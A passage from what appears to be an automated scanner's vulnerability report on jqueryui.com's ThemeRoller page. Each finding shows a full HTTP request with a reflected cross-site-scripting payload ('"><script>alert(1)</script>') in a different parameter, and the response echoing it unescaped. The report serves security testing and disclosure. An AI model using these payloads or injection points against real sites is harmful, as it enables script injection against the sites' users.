GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000803b3"><script>alert(1)</script>16217d3125f&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da533"><script>alert(1)</script>98ab798f7d6 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFFda533"><script>alert(1)</script>98ab798f7d6&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.p
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a11"><script>alert(1)</script>f172063c345 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000010a11"><script>alert(1)</script>f172063c345&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88141"><script>alert(1)</script>d9f5706c1f3 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF88141"><script>alert(1)</script>d9f5706c1f3&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_so
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01bb"><script>alert(1)</script>9b3eca5e28b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?c01bb"><script>alert(1)</script>9b3eca5e28b=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:51:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&c01bb"><script>alert(1)</script>9b3eca5e28b=1" type="text/css" media="all" />
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7177c"><script>alert(1)</script>9758f4953a3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px7177c"><script>alert(1)</script>9758f4953a3&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5167"><script>alert(1)</script>0387f9320ec was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2pxb5167"><script>alert(1)</script>0387f9320ec&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd2d"><script>alert(1)</script>4975e57d1e5 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=356cd2d"><script>alert(1)</script>4975e57d1e5&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" med
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 627d6"><script>alert(1)</script>c245b5368fc was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
conColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100627d6"><script>alert(1)</script>c245b5368fc&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5b8"><script>alert(1)</script>939b7359cb6 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
